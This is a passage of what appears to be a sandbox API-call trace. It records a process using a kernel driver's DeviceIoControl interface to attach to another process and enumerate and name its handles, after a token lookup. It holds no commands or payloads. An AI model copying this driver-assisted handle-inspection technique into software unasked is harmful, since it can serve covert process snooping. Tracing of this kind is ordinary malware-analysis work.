lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0225.472] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80037e1060, HandleInformation=0x0) returned 0x0 [0225.472] ObOpenObjectByPointer (in: Object=0xfffffa80037e1060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff80000654) returned 0x0 [0225.472] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xba [0225.472] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000654, DesiredAccess=0x8, TokenHandle=0xfffffa80028d8b40 | out: TokenHandle=0xfffffa80028d8b40*=0xc4) returned 0x0 [0225.472] ZwClose (Handle=0xffffffff80000654) returned 0x0 [0225.472] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.472] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0225.472] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="LOCAL SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0225.474] CloseHandle (hObject=0xc4) returned 1 [0225.474] CloseHandle (hObject=0xc8) returned 1 [0225.474] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.474] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0225.474] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.474] PsAcquireProcessExitSynchronization () returned 0x0 [0225.474] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0) [0225.474] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037cd370, HandleInformation=0x0) returned 0x0 [0225.474] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.474] PsReleaseProcessExitSynchronization () returned 0x2 [0225.474] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0225.474] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.474] ObfDereferenceObject (Object=0xfffffa80037cd370) returned 0x1 [0225.475] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.475] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.475] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.475] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0225.475] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.475] PsAcquireProcessExitSynchronization () returned 0x0 [0225.475] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0) [0225.475] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037ca070, HandleInformation=0x0) returned 0x0 [0225.475] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.475] PsReleaseProcessExitSynchronization () returned 0x2 [0225.475] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0225.475] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.475] ObfDereferenceObject (Object=0xfffffa80037ca070) returned 0x1 [0225.475] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.475] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.475] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.475] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0225.475] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.475] PsAcquireProcessExitSynchronization () returned 0x0 [0225.475] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0) [0225.475] ObReferenceObjectByHandle (in: Handle=0xe8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003854510, HandleInformation=0x0) returned 0x0 [0225.475] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.475] PsReleaseProcessExitSynchronization () returned 0x2 [0225.475] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0225.475] ObQueryNameString (in: Object=0xfffffa80027af4e0, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.475] ObfDereferenceObject (Object=0xfffffa8003854510) returned 0x1 [0225.476] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.476] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.476] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.476] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0225.476] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.476] PsAcquireProcessExitSynchronization () returned 0x0 [0225.476] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0) [0225.476] ObReferenceObjectByHandle (in: Handle=0xec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003855730, HandleInformation=0x0) returned 0x0 [0225.476] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.476] PsReleaseProcessExitSynchronization () returned 0x2 [0225.476] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0225.476] ObQueryNameString (in: Object=0xfffffa80027af4e0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.476] ObfDereferenceObject (Object=0xfffffa8003855730) returned 0x1 [0225.476] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.476] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.476] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.476] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x2a, lpOverlapped=0x0) returned 1 [0225.476] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.476] PsAcquireProcessExitSynchronization () returned 0x0 [0225.476] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0) [0225.476] ObReferenceObjectByHandle (in: Handle=0xf0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80038504b0, HandleInformation=0x0) returned 0x0 [0225.476] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.476] PsReleaseProcessExitSynchronization () returned 0x2 [0225.476] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0225.476] ObQueryNameString (in: Object=0xfffffa80027acc70, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.476] ObfDereferenceObject (Object=0xfffffa80038504b0) returned 0x1 [0225.476] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.476] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.476] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.477] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0225.477] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.477] PsAcquireProcessExitSynchronization () returned 0x0 [0225.477] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0) [0225.477] ObReferenceObjectByHandle (in: Handle=0xf4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003851070, HandleInformation=0x0) returned 0x0 [0225.477] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.477] PsReleaseProcessExitSynchronization () returned 0x2 [0225.477] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0225.477] ObQueryNameString (in: Object=0xfffffa80027b0e40, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.477] ObfDereferenceObject (Object=0xfffffa8003851070) returned 0x1 [0225.477] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.477] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.477] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.477] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0225.477] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.477] PsAcquireProcessExitSynchronization () returned 0x0 [0225.477] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0) [0225.477] ObReferenceObjectByHandle (in: Handle=0xf8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003850070, HandleInformation=0x0) returned 0x0 [0225.477] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.477] PsReleaseProcessExitSynchronization () returned 0x2 [0225.477] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0225.477] ObQueryNameString (in: Object=0xfffffa80027af2c0, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3508) returned 0x0 [0225.477] ObfDereferenceObject (Object=0xfffffa8003850070) returned 0x1 [0225.477] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.477] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.477] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.477] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0225.477] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.478] PsAcquireProcessExitSynchronization () returned 0x0 [0225.478] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0) [0225.478] ObReferenceObjectByHandle (in: Handle=0x140, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80038885e0, HandleInformation=0x0) returned 0x0 [0225.478] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.478] PsReleaseProcessExitSynchronization () returned 0x2 [0225.478] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0225.478] ObQueryNameString (in: Object=0xfffffa80038885e0, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.478] ObfDereferenceObject (Object=0xfffffa80038885e0) returned 0x1 [0225.478] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.478] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.478] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.478] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8e, lpOverlapped=0x0) returned 1 [0225.478] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.478] PsAcquireProcessExitSynchronization () returned 0x0 [0225.478] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0) [0225.478] ObReferenceObjectByHandle (in: Handle=0x1c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80034a7d10, HandleInformation=0x0) returned 0x0 [0225.478] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.478] PsReleaseProcessExitSynchronization () returned 0x2 [0225.478] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0225.478] ObQueryNameString (in: Object=0xfffffa80034a7d10, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.478] ObfDereferenceObject (Object=0xfffffa80034a7d10) returned 0xe [0225.478] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.478] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.478] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.478] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0225.478] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.478] PsAcquireProcessExitSynchronization () returned 0x0 [0225.478] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0) [0225.478] ObReferenceObjectByHandle (in: Handle=0x1f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003945dc0, HandleInformation=0x0) returned 0x0 [0225.478] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.479] PsReleaseProcessExitSynchronization () returned 0x2 [0225.479] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0225.479] ObQueryNameString (in: Object=0xfffffa8003945dc0, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.479] ObfDereferenceObject (Object=0xfffffa8003945dc0) returned 0x5 [0225.479] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.479] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.479] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.479] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0225.479] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.479] PsAcquireProcessExitSynchronization () returned 0x0 [0225.479] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0) [0225.479] ObReferenceObjectByHandle (in: Handle=0x260, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003995640, HandleInformation=0x0) returned 0x0 [0225.479] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.479] PsReleaseProcessExitSynchronization () returned 0x2 [0225.479] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0225.479] ObQueryNameString (in: Object=0xfffffa8003995640, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.479] ObfDereferenceObject (Object=0xfffffa8003995640) returned 0x1 [0225.479] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.479] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.480] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.480] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0225.480] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.480] PsAcquireProcessExitSynchronization () returned 0x0 [0225.480] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0) [0225.480] ObReferenceObjectByHandle (in: Handle=0x2d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0225.480] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.480] PsReleaseProcessExitSynchronization () returned 0x2 [0225.480] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0225.480] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa8003079044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003079044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.480] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0225.480] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.480] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.480] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.480] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0225.480] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.480] PsAcquireProcessExitSynchronization () returned 0x0 [0225.480] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0) [0225.480] ObReferenceObjectByHandle (in: Handle=0x2dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0225.480] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.480] PsReleaseProcessExitSynchronization () returned 0x2 [0225.480] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0225.481] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800312f044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800312f044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.481] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x23 [0225.481] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.481] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.481] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.481] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0225.481] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.481] PsAcquireProcessExitSynchronization () returned 0x0 [0225.481] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0) [0225.481] ObReferenceObjectByHandle (in: Handle=0x45c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001170d80, HandleInformation=0x0) returned 0x0 [0225.481] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0225.481] PsReleaseProcessExitSynchronization () returned 0x2 [0225.481] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0225.481] ObQueryNameString (in: Object=0xfffff8a001170d80, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880052b3550) returned 0x0 [0225.481] ObfDereferenceObject (Object=0xfffff8a001170d80) returned 0x8 [0225.481] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0225.481] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0225.481] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0225.481] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0225.481] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0225.481] PsAcquireProcessExitSynchronization () returned 0x0 [0225.481] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880052b35d0 | out: 